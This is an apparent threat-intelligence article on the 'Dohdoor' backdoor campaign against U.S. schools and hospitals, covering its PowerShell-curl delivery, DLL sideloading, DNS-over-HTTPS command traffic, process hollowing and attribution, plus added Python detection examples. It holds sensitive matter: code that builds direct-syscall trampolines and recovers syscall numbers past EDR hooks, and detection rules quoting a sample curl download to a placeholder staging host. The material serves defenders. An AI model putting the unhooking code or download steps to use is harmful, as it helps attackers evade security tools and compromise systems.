A suspected North Korean threat actor is deploying a stealthy new backdoor against U.S. education and healthcare organizations—hiding its command-and-control traffic inside encrypted DNS queries routed through Cloudflare, and using legitimate Windows executables to load its malware without triggering security tools.
On February 26, 2026, Cisco Talos published research revealing a previously undisclosed malware campaign that has been quietly targeting two of America's most vital and vulnerable sectors: education and healthcare. The threat actor, tracked as UAT-10027, has been deploying a sophisticated new backdoor dubbed "Dohdoor" since at least December 2025. The campaign combines several evasion techniques designed to slip past modern security defenses: DNS-over-HTTPS (DoH) to resolve its command-and-control (C2) servers without emitting plaintext DNS, DLL sideloading through legitimate Windows executables, endpoint detection and response (EDR) bypass via syscall unhooking, and infrastructure concealed behind Cloudflare's globally trusted edge network.
The research was authored by Cisco Talos security researchers Alex Karkins and Chetan Raghuprasad, whose technical findings were published on the Cisco Talos Intelligence blog and shared with The Hacker News. The researchers confirmed that Dohdoor uses the DoH technique for C2 communications and is capable of downloading and executing additional payload binaries reflectively.
Cisco Talos has assessed with low confidence that UAT-10027 may have ties to North Korea, citing technical overlaps with tools and techniques used by the Lazarus Group, one of the world's most prolific state-sponsored hacking collectives. This article provides an in-depth analysis of the Dohdoor campaign, its technical mechanisms, the threat it poses to U.S. institutions, and its potential connections to North Korean cyber operations.
Why Education and Healthcare?
The deliberate targeting of education and healthcare is not random. These sectors manage enormous volumes of sensitive data—student records, research intellectual property, patient health information protected under HIPAA, and financial records—yet they consistently operate with tighter cybersecurity budgets and more legacy infrastructure than their counterparts in finance or defense. Schools, universities, hospitals, and clinics often run outdated systems, rely on a patchwork of vendors, and face staffing shortages in their IT and security teams.
As reported by GBHackers, UAT-10027's focus is on education and healthcare entities in the U.S., sectors that handle highly sensitive personal and medical data but often have limited security budgets and legacy systems. This makes them attractive targets for threat actors seeking persistent access, data exfiltration, or leverage for future ransomware operations.
In July 2022, a joint advisory from CISA, the FBI, and the U.S. Department of the Treasury warned that North Korean state-sponsored actors had been using Maui ransomware to target Healthcare and Public Health sector organizations since at least May 2021. CISA assessed that North Korean actors would likely continue targeting healthcare because these organizations are often willing to pay ransoms to avoid disruption of critical services.
The Multi-Stage Attack Chain
Dohdoor is not delivered in a single step. Instead, UAT-10027 employs a carefully orchestrated multi-stage attack chain designed to minimize detection at each phase. The exact initial access vector has not been confirmed by Cisco Talos, but the available evidence is consistent with social engineering phishing techniques that lead victims to execute a malicious PowerShell script.
Stage 1: PowerShell Downloader
According to Cisco Talos telemetry, the attack begins when a victim executes a PowerShell script—likely delivered through a phishing email, though the initial access vector has not been confirmed. This script uses curl.exe with an encoded URL to download a malicious Windows batch file from a remote staging server. The use of curl.exe, a legitimate Windows utility, helps the initial download blend in with normal system activity.
Stage 2: Batch Script Loader
The downloaded batch script performs several critical actions. First, it creates a hidden working directory under C:\ProgramData or C:\Users\Public. It then downloads a malicious DLL from the C2 server and renames it to mimic legitimate Windows system files such as propsys.dll or batmeter.dll. Next, the script copies trusted, signed Windows executables into the same directory—specifically Fondue.exe, mblctr.exe, and ScreenClippingHost.exe—and uses them to execute the malicious DLL through DLL sideloading.
DLL sideloading exploits the Windows DLL search order: unless a DLL is already loaded in the process or is on the KnownDLLs list, the loader checks the directory of the executable before the system directories. By placing a malicious DLL with the expected filename alongside the legitimate executable, the attacker ensures the malware loads automatically when the trusted program runs. Because the parent process is a signed Microsoft binary, security tools are far less likely to flag the activity as malicious. The copy itself is the tell: a signed Windows utility should not be running from, or loading system DLL names out of, a user-writable staging directory such as ProgramData or Users\Public.
Stage 3: Anti-Forensic Cleanup
After successfully loading the malware, the batch script performs anti-forensic cleanup to cover its tracks. As detailed by Cisco Talos, the script deletes the Run command history from the Windows RunMRU registry key, clears clipboard data, and then deletes itself entirely. This systematic evidence destruction makes incident response and forensic investigation significantly more difficult.
Inside Dohdoor: Technical Analysis
Once active, Dohdoor employs several sophisticated techniques that distinguish it from commodity malware and place it in the category of advanced persistent threat (APT) tooling.
Artifact Evidence and Timeline
Dohdoor is a 64-bit DLL whose PE header carries a compile timestamp of November 25, 2025, weeks before the campaign's observed start in December 2025, which suggests the threat actor had development and testing time before deployment (compile timestamps can be forged, so treat this as an indicator rather than proof). The binary contains the debug path string C:\Users\diablo\Desktop\SimpleDll\TlsClient.hpp, which offers a partial window into the attacker's development environment and may aid future attribution efforts.
DNS-over-HTTPS for Covert C2 Communication
Dohdoor's most distinctive feature is its use of DNS-over-HTTPS (DoH) to resolve its command-and-control infrastructure. Rather than making standard plaintext DNS queries that network security tools can easily monitor and block, the malware sends encrypted HTTPS requests to Cloudflare's DoH service on port 443. These requests use specific HTTP headers—including a User-Agent string of insomnia/11.3.0 and an Accept header of application/dns-json—to retrieve C2 server IP addresses embedded in JSON responses.
"The threat actor hides the C2 servers behind the Cloudflare infrastructure, ensuring that all outbound communication from the victim machine appears as legitimate HTTPS traffic to a trusted global IP address." — Cisco Talos
This approach defeats controls that depend on seeing plaintext DNS: resolver logs, DNS sinkholes, and traffic analysis tools that watch for suspicious domain lookups never see the name being resolved. It does not make the traffic invisible. The connection to Cloudflare's DoH endpoint still exposes its destination address and TLS SNI, and a sideloaded Windows system utility asking a public resolver for dns-json answers is itself an anomaly worth alerting on. After resolving the C2 IP address, Dohdoor establishes HTTPS tunnels using GET requests that mimic legitimate curl traffic, with User-Agent strings like curl/7.88 or curl/7.83.1.
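The DoH lookup and the tunnel that follows it leave two correlatable traces on the wire. What follows is an added example, not code from Cisco Talos or from this article, of how a defender could parse the dns-json answers and tie a non-browser DoH lookup to the HTTPS connection it enables. The sensor records are constructed: the field names, the response_body field (only a TLS-terminating proxy would have it), the .invalid domain and the TEST-NET addresses are all assumptions; the header values and the case-insensitive handling of the resolved name follow the article.

```python
"""Correlate non-browser DNS-over-HTTPS lookups with the HTTPS connections
they enable. Added example for this article, not Cisco Talos code. The records
are constructed to resemble what a TLS-inspecting proxy or EDR network sensor
might log; the field names and the response_body field (only available where
TLS is terminated) are assumptions."""
import json
import re

DOH_HOSTS = {"cloudflare-dns.com", "1.1.1.1", "1.0.0.1"}  # Cloudflare DoH endpoints
DOH_JSON = "application/dns-json"                          # Accept header the article reports
BROWSER_UA = re.compile(r"^Mozilla/5\.0")                  # mainstream browsers all start this way
CURL_UA = re.compile(r"^curl/\d+\.\d+")                    # tunnel traffic mimics curl/7.88, curl/7.83.1


def parse_dns_json(body):
    """Return [(name, ip)] for the A records in a Cloudflare dns-json response.
    Names are lowercased and stripped of the trailing dot because DNS is
    case-insensitive: MswInSofTUpDloAd and mswinsoftupdload are the same label."""
    doc = json.loads(body)
    if doc.get("Status") != 0:  # 0 is NOERROR; anything else carried no usable answer
        return []
    return [(a["name"].lower().rstrip("."), a["data"])
            for a in doc.get("Answer", []) if a.get("type") == 1]


def hunt(records):
    """Walk sensor records in time order; return [(severity, detail)]."""
    resolved = {}  # ip -> (process, name) learned from suspicious lookups
    findings = []
    for r in records:
        ua = r["headers"].get("User-Agent", "")
        accept = r["headers"].get("Accept", "")
        # Rule 1: a dns-json DoH lookup from something that is not a browser.
        if r["host"] in DOH_HOSTS and accept == DOH_JSON and not BROWSER_UA.match(ua):
            answers = parse_dns_json(r.get("response_body", "{}"))
            for name, ip in answers:
                resolved[ip] = (r["process"], name)
            findings.append(("medium", f"{r['process']} resolved "
                             f"{[n for n, _ in answers]} via DoH, UA {ua!r}"))
            continue
        # Rule 2: a later connection to an address learned in Rule 1, carrying a
        # curl-style UA from a process that is not curl.exe.
        if r["dst_ip"] in resolved and CURL_UA.match(ua) and r["process"].lower() != "curl.exe":
            proc, name = resolved[r["dst_ip"]]
            findings.append(("high", f"{r['process']} contacted {r['dst_ip']} ({name}), "
                             f"resolved earlier by {proc}; UA {ua!r}"))
    return findings


# Constructed sample records (TEST-NET addresses and a reserved .invalid name).
SAMPLE_RECORDS = [
    {"process": "firefox.exe", "host": "cloudflare-dns.com", "dst_ip": "1.1.1.1",
     "headers": {"User-Agent": "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:128.0) Gecko/20100101 Firefox/128.0",
                 "Accept": "application/dns-message"}},
    {"process": "ScreenClippingHost.exe", "host": "cloudflare-dns.com", "dst_ip": "1.1.1.1",
     "headers": {"User-Agent": "insomnia/11.3.0", "Accept": "application/dns-json"},
     "response_body": json.dumps({"Status": 0,
                                  "Question": [{"name": "MswInSofTUpDloAd.ExAmPle.InVaLiD.", "type": 1}],
                                  "Answer": [{"name": "MswInSofTUpDloAd.ExAmPle.InVaLiD.", "type": 1,
                                              "TTL": 300, "data": "203.0.113.10"}]})},
    {"process": "ScreenClippingHost.exe", "host": "203.0.113.10", "dst_ip": "203.0.113.10",
     "headers": {"User-Agent": "curl/7.88", "Accept": "*/*"}},
    {"process": "chrome.exe", "host": "www.example.com", "dst_ip": "198.51.100.5",
     "headers": {"User-Agent": "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 Chrome/124.0 Safari/537.36",
                 "Accept": "text/html"}},
]

if __name__ == "__main__":
    for severity, detail in hunt(SAMPLE_RECORDS):
        print(severity.upper(), detail)
```

Run against the sample records, the Firefox and Chrome entries produce nothing, the insomnia lookup produces a medium finding, and the curl-style GET to the address it returned produces a high one. Where TLS is not terminated, Rule 1 still works on destination and SNI alone, but the resolved addresses are unavailable and Rule 2 has to fall back on "curl UA from a non-curl process".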
EDR Bypass via Syscall Unhooking
Dohdoor implements an advanced EDR evasion technique by unhooking system calls in ntdll.dll. Endpoint detection and response products commonly monitor Windows API calls by placing hooks at the beginning of critical functions in the ntdll.dll library. These hooks redirect execution through the security product's monitoring code before allowing the original system call to proceed.
According to Cisco Talos, Dohdoor detects these hooks by reading the first bytes of targeted ntdll functions and comparing them against the expected syscall stub pattern. If hooks are detected, the malware patches in a direct syscall trampoline that bypasses the hooked function entirely, executing the system call without triggering the security product's monitoring code. The malware dynamically resolves Windows API functions by hash rather than using static imports, which further complicates static analysis and signature-based detection.
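To make the hook check concrete, here is an added example (not Dohdoor's code) of the logic a loader runs against the first bytes of each Nt* stub, together with the defender's view of the same data: the same comparison, run from an integrity monitor, lists which exports an EDR has hooked. The export table, its RVAs and SSN values are constructed. Recovering the SSN of a hooked stub from a clean neighbour is the commonly documented approach; the article does not say which method Dohdoor uses, so that part is an assumption.

```python
"""Hook detection on x64 ntdll syscall stubs, as a loader checks before
choosing a direct syscall, and as a defender can check to spot tampering.
Added example for this article, not Dohdoor's code; the export table below
is constructed and its SSN values are made up."""
import struct

CLEAN_PREFIX = b"\x4c\x8b\xd1\xb8"   # mov r10, rcx ; mov eax, <imm32 SSN>
STUB_SIZE = 0x20                     # x64 ntdll lays Nt* stubs out in 32-byte slots


def classify_stub(stub):
    """("clean", ssn) for an untouched stub, ("hooked", kind) otherwise."""
    if stub[:4] == CLEAN_PREFIX:
        return ("clean", struct.unpack_from("<I", stub, 4)[0])
    if stub[0] == 0xE9:               # jmp rel32: the usual inline hook
        return ("hooked", "jmp_rel32")
    if stub[:2] == b"\xff\x25":       # jmp [rip+disp32]: absolute-address hook
        return ("hooked", "jmp_indirect")
    return ("hooked", "unknown")


def find_hooked(exports):
    """Names whose stub no longer starts with the expected syscall prologue."""
    return [e["name"] for e in exports if classify_stub(e["bytes"])[0] != "clean"]


def recover_ssn(exports, name):
    """SSN of `name` even when its own stub is hooked. Stubs sit in address
    order with SSNs increasing by one per slot, so a clean neighbour's SSN
    plus the slot distance gives the answer (the Halo's Gate idea; the
    article does not say which method Dohdoor uses)."""
    idx = next(i for i, e in enumerate(exports) if e["name"] == name)
    kind, val = classify_stub(exports[idx]["bytes"])
    if kind == "clean":
        return val
    for dist in range(1, len(exports)):
        for j, sign in ((idx - dist, +1), (idx + dist, -1)):
            if 0 <= j < len(exports):
                k, v = classify_stub(exports[j]["bytes"])
                if k == "clean":
                    slots = abs(exports[idx]["rva"] - exports[j]["rva"]) // STUB_SIZE
                    return v + sign * slots
    raise ValueError(f"no clean neighbour for {name}")


def build_stub(ssn):
    """Bytes of a direct-syscall trampoline: mov r10,rcx ; mov eax,ssn ; syscall ; ret."""
    return CLEAN_PREFIX + struct.pack("<I", ssn) + b"\x0f\x05\xc3"


def _slot(body):
    """Pad a constructed stub to one 32-byte slot."""
    return body + b"\xcc" * (STUB_SIZE - len(body))


# Constructed export table: three adjacent stubs, two of them hooked by an EDR.
EXPORTS = [
    {"name": "NtAllocateVirtualMemory", "rva": 0x1000, "bytes": _slot(build_stub(0x18))},
    {"name": "NtWriteVirtualMemory",    "rva": 0x1020, "bytes": _slot(b"\xe9" + struct.pack("<i", 0x4F000))},
    {"name": "NtProtectVirtualMemory",  "rva": 0x1040, "bytes": _slot(b"\xff\x25" + struct.pack("<i", 0x2F00))},
]

if __name__ == "__main__":
    print("hooked:", find_hooked(EXPORTS))
    for e in EXPORTS:
        print(e["name"], hex(recover_ssn(EXPORTS, e["name"])))
```

The defensive reading of the same routine is the useful one: feed it the first bytes of every Nt* export as mapped in a live process and compare against the copy of ntdll.dll on disk. A stub that is clean on disk but hooked in memory is the EDR's own hook; a stub that is hooked on disk, or whose in-memory bytes were restored to the clean prologue while the EDR's hooks elsewhere remain, points at tampering of the kind the article describes.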
Custom Encryption and Process Hollowing
Dohdoor's payload is protected with a custom XOR-SUB decryption scheme that uses a 4:1 encrypted-to-decrypted size ratio and position-dependent logic. The implementation leverages SIMD (Single Instruction, Multiple Data) instructions for bulk processing, with a secondary loop handling remaining bytes. The decryption routine uses a constant of 0x26—a detail that becomes significant when examining potential links to North Korean tooling.
Once decrypted, the payload is injected into legitimate Windows processes through process hollowing. Dohdoor targets hardcoded system binaries including OpenWith.exe, wksprt.exe, ImagingDevices.exe, and wab.exe, executing its payload under the guise of these trusted processes to evade behavioral detection.
Deceptive Infrastructure
UAT-10027 has constructed its C2 infrastructure to resist simple string-based blocking. The campaign uses deceptive subdomains such as "MswInSofTUpDloAd" and "DEEPinSPeCTioNsyStEM" on top-level domains written in mixed case, such as .OnLiNe, .DeSigN, and .SoFTWARe. The names are chosen to resemble software update or security inspection systems at a glance. DNS itself is case-insensitive, so the mixed case changes nothing at resolution time; its purpose is to slip past case-sensitive string matching in scanners and blocklists, which is why detection logic should normalize domain names to lowercase before comparing them against indicators.
The Final Payload: Likely Cobalt Strike
While Cisco Talos was unable to capture a complete final payload, the evidence strongly suggests that Dohdoor serves as a loader for Cobalt Strike, one of the most widely used penetration testing frameworks, and one of the most commonly abused by threat actors for post-exploitation operations. TLS fingerprints from one of the C2 hosts, including a JA3S hash of 466556e923186364e82cbdb4cad8df2c and a specific certificate serial number, are consistent with default Cobalt Strike server profiles. JA3S fingerprints the server's TLS stack rather than the payload it delivers, so this is corroborating rather than conclusive evidence.
If Cobalt Strike beacons are indeed the final payload, the implications are severe. Cobalt Strike provides attackers with capabilities for lateral movement across compromised networks, credential harvesting, data exfiltration, and the deployment of additional malware or ransomware. For organizations in education and healthcare—which store vast repositories of personally identifiable information (PII), protected health information (PHI), and valuable research data—this represents a significant risk of large-scale data compromise.
As of the Cisco Talos publication date, analysis of the campaign revealed no evidence of data exfiltration. Researcher Chetan Raghuprasad confirmed that the attacker infected several educational institutions, including a university connected to several other institutions, indicating a potentially wider attack surface. One of the affected entities was a healthcare facility specifically providing elderly care. Given that Dohdoor is designed to establish persistent access and load additional payloads, the absence of observed exfiltration does not mean the threat has concluded.
The North Korean Connection
Cisco Talos has assessed with low confidence that UAT-10027 may have ties to North Korea's Lazarus Group. The assessment is based on several overlapping technical indicators, though the confidence level reflects meaningful differences in targeting that prevent a stronger attribution.
Technical Overlaps with Lazarus
The primary technical link is between Dohdoor and Lazarloader, a downloader tool previously identified by S2W Threat Intelligence Center as used by the Lazarus Group in campaigns targeting South Korea. S2W's analysis confirmed that Lazarloader uses XOR-SUB operations to recover embedded payloads, with execution arguments serving as decryption keys. Dohdoor's decryption routine mirrors this approach, including the use of the same 0x26 constant.
Additional overlaps include the NTDLL unhooking technique for EDR evasion, DLL sideloading methodology, the use of DNS-over-HTTPS via Cloudflare, and process hollowing for payload execution. The campaign's use of mixed-case top-level domains including .design, .software, and .online also aligns with operational preferences previously observed in Lazarus campaigns.
Divergence in Targeting
The reason for the low confidence assessment is that UAT-10027's focus on education and healthcare deviates from the Lazarus Group's well-documented preference for targeting cryptocurrency exchanges, financial institutions, and defense organizations. According to Palo Alto's Unit 42, the Lazarus Group operates under North Korea's Reconnaissance General Bureau (RGB) and has historically concentrated on financially motivated operations and intelligence collection targeting defense and technology sectors.
However, Cisco Talos pointed out that North Korean APT actors have previously targeted both healthcare and education. The 2022 CISA advisory documented the use of Maui ransomware against healthcare organizations, and Kimsuky—another North Korean APT cluster tracked separately from the Lazarus Group umbrella—has been observed targeting educational institutions. Notably, Andariel (also tracked as APT45 and Onyx Sleet), a cluster assessed to operate under the RGB and closely associated with Lazarus Group infrastructure, has conducted ransomware operations specifically against healthcare organizations, with those proceeds funding intelligence activities. This dual-mission precedent—persistent access combined with potential financial motivation—is relevant context for interpreting UAT-10027's healthcare targeting.
Understanding the Lazarus Group requires recognizing that it functions less as a single entity and more as an umbrella term for several related clusters operating under the RGB. Mandiant's 2022 research documented that at least three distinct groups—TEMP.Hermit, APT38, and Andariel—were assessed to operate under what was then called Lab 110, the primary organizational unit behind Lazarus Group activities. In a revised 2024 assessment, Mandiant updated this framing as North Korean cyber operations evolved post-pandemic, placing Lazarus Group clusters directly under the RGB rather than through the Lab 110 bureau designation, reflecting how shared infrastructure and overlapping operations had blurred prior distinctions. It is worth noting that Kimsuky, while also a North Korean state-sponsored group, is generally assessed to operate under a separate RGB bureau and is not a Lazarus Group sub-cluster—though all North Korean cyber activity ultimately falls under RGB direction. Regardless of the precise organizational lines, tooling and tradecraft can appear across campaigns with varying targeting profiles, which is part of what makes attribution in this case uncertain.
MITRE ATT&CK Techniques Observed
The Dohdoor campaign demonstrates a broad range of tactics and techniques mapped to the MITRE ATT&CK framework:
- Initial Access: Phishing (T1566), suspected; initial access vector not confirmed
- Execution: PowerShell (T1059.001), Windows Command Shell via batch files (T1059.003)
- Persistence & Privilege Escalation: DLL Side-Loading (T1574.002)
- Defense Evasion: Process Hollowing (T1055.012), Dynamic API Resolution by hash (T1027.007), custom XOR-SUB payload decryption (T1140), syscall unhooking to bypass user-mode EDR hooks (T1562.001, Impair Defenses: Disable or Modify Tools), System Binary Proxy Execution / living-off-the-land (T1218), Indicator Removal through RunMRU and clipboard cleanup and script self-deletion (T1070, T1070.004)
- Command & Control: Application Layer Protocol: DNS (T1071.004) carried over DoH, Ingress Tool Transfer via curl.exe (T1105), C2 hidden behind Cloudflare's trusted infrastructure (T1090.002)
Defensive Recommendations
Organizations in the education and healthcare sectors should take immediate steps to assess their exposure to this threat. Cisco Talos has released specific detection signatures, including ClamAV signatures (Win.Loader.Dohdoor-10059347-0, Win.Loader.Dohdoor-10059535-0, Ps1.Loader.Dohdoor-10059533-0, and Ps1.Loader.Dohdoor-10059534-0) and Snort rules (SIDs 65949–65951 for Snort 2, and 301407 and 65949 for Snort 3). Indicators of compromise (IOCs) are available on the Cisco Talos GitHub repository.
Beyond signature-based detection, organizations should focus on behavioral monitoring. Key detection opportunities include:
- Monitor for suspicious PowerShell and batch script executions, particularly those that invoke curl.exe to download remote scripts
- Watch for anomalous DLL loading activity, especially when legitimate signed Windows executables load DLLs from unexpected directories like ProgramData or Public folders
- Deploy DNS security controls that account for DoH, and flag non-browser processes making HTTPS connections to Cloudflare's DoH endpoints; the destination address and TLS SNI remain visible even though the queries themselves are encrypted
- Query EDR telemetry for anomalous child processes spawned by legitimate signed executables loading DLLs from unexpected working directories
- Isolate hosts exhibiting unauthorized DLL sideloading behavior and capture memory dumps for forensic analysis
- Reimage confirmed compromised assets from known-good baselines
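Taken together, the three stages described under "The Multi-Stage Attack Chain" and the detection bullets above reduce to a handful of host-level rules. The following is an added example, not a Cisco Talos signature or rule, that expresses those rules in Python and runs them over constructed Sysmon-style events. The event schema is simplified (id 1 process creation, 7 image load, 12 registry key deletion), and every path, command line, URL and SID in the sample is made up; the binary names, DLL names and staging directories are the ones the article reports.

```python
"""Hunting rules for the Dohdoor delivery chain, run over constructed
Sysmon-style events. Added example for this article, not Cisco Talos
signatures. Field names follow Sysmon loosely (id 1 process create, 7 image
load, 12 registry key delete) but are simplified, and every path, command
line, URL and SID below is made up."""
import re
from pathlib import PureWindowsPath

STAGING_DIRS = (r"c:\programdata", r"c:\users\public")   # working directories the article names
DECOY_DLLS = {"propsys.dll", "batmeter.dll"}             # names the malicious DLL is renamed to
HOLLOW_TARGETS = {"openwith.exe", "wksprt.exe", "imagingdevices.exe", "wab.exe"}
SCRIPT_HOSTS = {"powershell.exe", "pwsh.exe", "cmd.exe"}
DOWNLOAD_RE = re.compile(r"https?://|frombase64string|base64", re.I)


def basename(path):
    return PureWindowsPath(path).name.lower()


def parent_dir(path):
    return str(PureWindowsPath(path).parent).lower()


def in_staging(path):
    p = path.lower()
    return any(p.startswith(d) for d in STAGING_DIRS)


def evaluate(events):
    """Return [(severity, rule, detail)] for every event that matches a rule."""
    hits = []
    for e in events:
        img = basename(e.get("image", ""))
        par = basename(e.get("parent_image", ""))
        # Stage 1: a script host launching curl.exe with a URL or encoded argument.
        if (e["id"] == 1 and img == "curl.exe" and par in SCRIPT_HOSTS
                and DOWNLOAD_RE.search(e["cmdline"])):
            hits.append(("medium", "script-driven curl download", e["cmdline"]))
        # Stage 2: a Microsoft-signed host running from a staging directory loads a
        # decoy-named DLL from its own directory instead of from System32.
        if (e["id"] == 7 and basename(e["loaded"]) in DECOY_DLLS
                and e.get("signature", "").lower().startswith("microsoft")
                and in_staging(e["image"]) and parent_dir(e["loaded"]) == parent_dir(e["image"])):
            hits.append(("high", "DLL sideload from staging dir", f"{e['image']} -> {e['loaded']}"))
        # Hollowing: a known target binary spawned by something living in a staging directory.
        if e["id"] == 1 and img in HOLLOW_TARGETS and in_staging(e.get("parent_image", "")):
            hits.append(("high", "hollowing target spawned from staging dir", f"{par} -> {img}"))
        # Stage 3: RunMRU wiped by a shell.
        if (e["id"] == 12 and e.get("event_type") == "DeleteKey"
                and e["target"].lower().endswith("\\runmru") and img in SCRIPT_HOSTS):
            hits.append(("medium", "RunMRU history deleted", e["target"]))
    return hits


# Constructed events: four malicious, two benign look-alikes.
EVENTS = [
    {"id": 1, "image": r"C:\Windows\System32\curl.exe",
     "parent_image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "cmdline": r"curl.exe -s -o C:\ProgramData\upd\run.bat http://staging.example.invalid/s2"},
    {"id": 1, "image": r"C:\Windows\System32\curl.exe",          # benign: interactive shell, not a script host
     "parent_image": r"C:\Program Files\Git\git-bash.exe",
     "cmdline": "curl.exe https://www.example.com/"},
    {"id": 7, "image": r"C:\ProgramData\upd\ScreenClippingHost.exe", "signature": "Microsoft Windows",
     "loaded": r"C:\ProgramData\upd\propsys.dll"},
    {"id": 7, "image": r"C:\Windows\explorer.exe", "signature": "Microsoft Windows",   # benign: the real propsys.dll
     "loaded": r"C:\Windows\System32\propsys.dll"},
    {"id": 1, "image": r"C:\Windows\System32\OpenWith.exe",
     "parent_image": r"C:\ProgramData\upd\ScreenClippingHost.exe", "cmdline": "OpenWith.exe"},
    {"id": 12, "image": r"C:\Windows\System32\cmd.exe", "event_type": "DeleteKey",
     "target": r"HKU\S-1-5-21-1111-2222-3333-1001\Software\Microsoft\Windows\CurrentVersion\Explorer\RunMRU"},
]

if __name__ == "__main__":
    for sev, rule, detail in evaluate(EVENTS):
        print(f"[{sev}] {rule}: {detail}")
```

The sideload rule is deliberately broader than the three host binaries the article names: any Microsoft-signed executable running out of ProgramData or Users\Public and loading a system DLL name from its own directory is worth a look, because the actor can swap hosts without changing the technique. The two benign events show where the rules stay quiet: curl.exe from an interactive shell, and explorer.exe loading the genuine propsys.dll from System32.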
These recommendations align with NIST SP 800-61 Revision 3 and the NIST Cybersecurity Framework (CSF) 2.0.
The Bigger Picture
The Dohdoor campaign arrives at a time when cyber threats against U.S. critical infrastructure are intensifying. The education sector has faced an increasing wave of ransomware attacks in recent years, with school districts and universities losing access to critical systems and sensitive student data. Healthcare, meanwhile, remains one of the most targeted sectors globally. The combination of high data value, operational urgency, limited security resources, and the potential for life-threatening disruption makes these organizations particularly attractive to both financially motivated cybercriminals and state-sponsored actors.
"They're pretty ruthless, as we have seen in the past." — John Riggi, National Adviser for Cybersecurity and Risk, American Hospital Association (July 2022, on North Korean actors targeting healthcare)
Riggi's words, spoken in the context of Maui ransomware, apply with equal force here. The Dohdoor campaign does not appear to have resulted in data exfiltration as of the Cisco Talos publication date, but Dohdoor's design—persistent access, in-memory execution, and a likely Cobalt Strike payload—is built for long-term presence, not smash-and-grab operations. The absence of observed exfiltration is not the same as the absence of harm.
If the attribution to North Korea is accurate, the Dohdoor campaign represents a continued evolution in Pyongyang's cyber capabilities. North Korean threat clusters have demonstrated the ability to develop custom tooling, adapt their techniques to evade improving defenses, and operate across sectors beyond their traditional focus areas. The use of DNS-over-HTTPS for C2 communications, in particular, signals direct awareness of—and deliberate adaptation to—the network monitoring capabilities that defenders have deployed in recent years.
The Dohdoor campaign reinforces the case for layered security architectures, current threat intelligence subscriptions, and incident response capabilities calibrated to the increasingly sophisticated threats that education and healthcare organizations face. For sectors that have historically been treated as soft targets, the message from this campaign is clear: the sophistication gap between attacker and defender is not closing on its own.
Sources
- Karkins, A., & Raghuprasad, C. (February 26, 2026). "New Dohdoor malware campaign targets education and health care." Cisco Talos Intelligence Blog. https://blog.talosintelligence.com/new-dohdoor-malware-campaign/
- Lakshmanan, R. (February 26, 2026). "UAT-10027 Targets U.S. Education and Healthcare with Dohdoor Backdoor." The Hacker News. https://thehackernews.com/2026/02/uat-10027-targets-us-education-and.html
- Kathir, M. (February 27, 2026). "Dohdoor Malware Targets U.S. Schools and Healthcare with Multi-Stage Attack." GBHackers. https://gbhackers.com/dohdoor-malware/
- Paganini, P. (February 26, 2026). "UAT-10027 campaign hits U.S. education and healthcare with stealthy Dohdoor backdoor." Security Affairs. https://securityaffairs.com/188558/...
- Apostol, L. (February 27, 2026). "New 'Dohdoor' Deployed by UAT-10027 Against U.S. Education and Healthcare." TechNadu. https://www.technadu.com/...
- S2W Threat Intelligence Center (TALON). "IoC Update of Lazarus Group's Recent Attack Campaign Targeting South Korea." S2W. https://www.s2w.inc/en/resource/detail/941
- CISA, FBI, & U.S. Department of the Treasury. (July 6, 2022). "North Korean State-Sponsored Cyber Actors Use Maui Ransomware to Target the Healthcare and Public Health Sector." CISA Advisory AA22-187A. https://www.cisa.gov/...
- NSA, FBI, CISA, HHS, NIS, & DSA. (February 2023). "Ransomware Attacks on Critical Infrastructure Fund DPRK Malicious Cyber Activities." Joint Cybersecurity Advisory AA23-040A. https://www.cisa.gov/news-events/cybersecurity-advisories/aa23-040a
- Barnhart, M., et al. (March 23, 2022). "Not So Lazarus: Mapping DPRK Cyber Threat Groups to Government Organizations." Mandiant / Google Cloud Blog. https://cloud.google.com/blog/topics/threat-intelligence/mapping-dprk-groups-to-government
- Mandiant. (March 2024). "Assessed Cyber Structure and Alignments of North Korea in 2023." Google Cloud Blog. https://cloud.google.com/blog/topics/threat-intelligence/north-korea-cyber-structure-alignment-2023
- Unit 42. (October 9, 2024). "Threat Assessment: North Korean Threat Groups." Palo Alto Networks. https://unit42.paloaltonetworks.com/threat-assessment-north-korean-threat-groups-2024/
- MITRE ATT&CK. "Andariel (G0138)." https://attack.mitre.org/groups/G0138/
- Cisco Talos IOCs GitHub Repository. https://github.com/Cisco-Talos/IOCs
- MITRE ATT&CK. "Lazarus Group (G0032)." https://attack.mitre.org/groups/G0032/
- Rescana. (February 26, 2026). "Dohdoor Backdoor Attack: UAT-10027 Targets Windows Systems in U.S. Education and Healthcare Sectors." https://www.rescana.com/...
- Cimpanu, C. (July 6, 2022). "FBI, CISA, Treasury: North Korean hackers taking aim at health care with Maui ransomware." CyberScoop. https://cyberscoop.com/fbi-cisa-treasury-north-korea-ransomware-maui-alert-health-care/